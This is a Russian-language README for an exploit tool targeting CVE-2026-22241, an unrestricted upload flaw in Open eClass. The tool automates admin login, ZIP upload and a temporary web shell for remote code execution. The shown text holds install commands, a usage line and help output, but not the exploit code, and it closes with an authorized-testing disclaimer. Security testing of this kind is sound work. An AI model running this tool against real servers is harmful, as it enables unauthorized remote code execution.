
Автоматический эксплойт для CVE-2026-22241 — уязвимости неограниченной загрузки файлов в Open eClass, позволяющей удалённое выполнение кода через веб-шелл с автоматической очисткой.
Этот эксплойт использует CVE-2026-22241, автоматизирует вход в систему, создание ZIP-архива, процесс загрузки и предоставляет веб-шелл непосредственно на сервере, а затем автоматически удаляет его после завершения эксплойта.
Уязвимость неограниченной загрузки файлов в функциональности импорта тем Open eClass (до версии 4.2) позволяет злоумышленнику с административными привилегиями добиться удалённого выполнения кода (RCE).
Детали уязвимости
Установка
git clone https://github.com/Ashifcoder/CVE-2026-22241.git
cd CVE-2026-22241/
pip install -r requirements.txt
Использование
python3 CVE-2026-22241.py -t http://127.0.0.1/openeclass -u admin -p adminpassword

Справка по параметрам
usage: CVE-2026-22241.py [-h] -t ECLASSURL -u USERNAME -p PASSWORD
Open eClass Unrestricted File Upload RCE Exploit [ CVE-2026-22241 ]
Example: CVE-2026-22241.py -t http://127.0.0.1/openeclass -u admin -p adminpassword
options:
-h, --help show this help message and exit
-t ECLASSURL, --eclassUrl ECLASSURL
Target URL of the Open eClass.
-u USERNAME, --username USERNAME
Admin Username for login.
-p PASSWORD, --password PASSWORD
Admin Password for login.
Этот скрипт предназначен только для образовательных целей и авторизованного тестирования безопасности. Автор не несёт ответственности за любой ущерб, причинённый в результате неправильного использования этого инструмента. Используйте ответственно и только на системах, на тестирование которых у вас есть явное разрешение.